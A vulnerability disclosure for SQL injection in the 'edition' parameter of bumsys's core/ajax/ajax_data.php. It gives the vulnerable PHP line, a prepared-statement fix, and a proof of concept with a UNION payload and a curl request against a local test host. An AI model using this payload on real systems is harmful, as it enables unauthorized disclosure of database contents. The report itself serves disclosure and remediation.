SQL Injection in 'core/ajax/ajax_data.php' in unilogies/bumsys
Valid
Reported on Mar 1st 2023
Description
There exists an SQL injection affecting the edition parameter, handled in the file core/ajax/ajax_data.php:
// core/ajax/ajax_data.php (line 573): the raw GET value is interpolated straight into the SQL string
$productEditionFilter = ( isset($_GET["edition"]) and !empty($_GET["edition"]) ) ? " product_edition = '{$_GET["edition"]}' " : " product_type != 'Child' ";
We see that $_GET["edition"] is appended unsanitized to part of the SQL query.
Fix
Properly sanitize the edition parameter.
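As an added example (this is not code from unilogies/bumsys), here is the same filter rebuilt so that the edition value is bound as a prepared-statement parameter instead of being spliced into the query text. The products table, the selected columns, the surrounding SELECT and the connection details are assumptions, since the report only shows the filter fragment.

```php
<?php
// Added example, not code from unilogies/bumsys. The `products` table, the
// selected columns and the connection details are assumptions; the report
// only shows the filter fragment from core/ajax/ajax_data.php.

// Make mysqli throw on prepare/execute failures instead of returning false.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// Build the WHERE fragment the way the original does, but hand the user
// value back separately so it is bound as a parameter, never as SQL text.
function buildProductFilter(array $get): array
{
    if (!empty($get['edition'])) {
        return [' product_edition = ? ', [$get['edition']]];
    }
    return [" product_type != 'Child' ", []];
}

function fetchProducts(mysqli $db, array $get): array
{
    [$where, $params] = buildProductFilter($get);
    $stmt = $db->prepare('SELECT product_id, product_name FROM products WHERE' . $where);
    if ($params !== []) {
        // One 's' type specifier per bound string parameter.
        $stmt->bind_param(str_repeat('s', count($params)), ...$params);
    }
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// With the value bound, the payload from the proof of concept is compared
// literally against product_edition: the query simply returns no rows and
// the UNION is never parsed as SQL.
$db = new mysqli('localhost', 'bumsys_user', 'secret', 'bumsys'); // assumed credentials
$db->set_charset('utf8mb4');
var_dump(fetchProducts($db, ['edition' => "a' union all select 1,version(),3#"]));
```

get_result() requires the mysqlnd driver; with PDO the same pattern applies using named placeholders and execute($params). If the set of valid editions is known, rejecting any value outside that allow-list before the query adds a second, independent check.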
Proof of Concept
Make a GET request to http://bumsys.local/info?module=data&page=productList&edition=a'+union+all+select+1,version(),3%23 with a valid session and a valid CSRF token, and observe the output of the MySQL version() function in the response.
curl -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0' -H 'Connection: keep-alive' -H 'Cookie: eid=1; __5604118335cb0000a84ea1f5b9befc7b8de1bc72=htcj0ak63hpr5olf9no7ta7itk; currencySymbol=%E0%A7%B3; keepAlive=1' -H 'X-CSRF-TOKEN: 60adf385871243969f091178dec627e96719915b' --url "http://bumsys.local/info?module=data&page=productList&edition=a'+union+all+select+1,version(),3%23"
Impact
Authenticated users are able to disclose the contents of the database.
Occurrences
ajax_data.php#L573 (validated)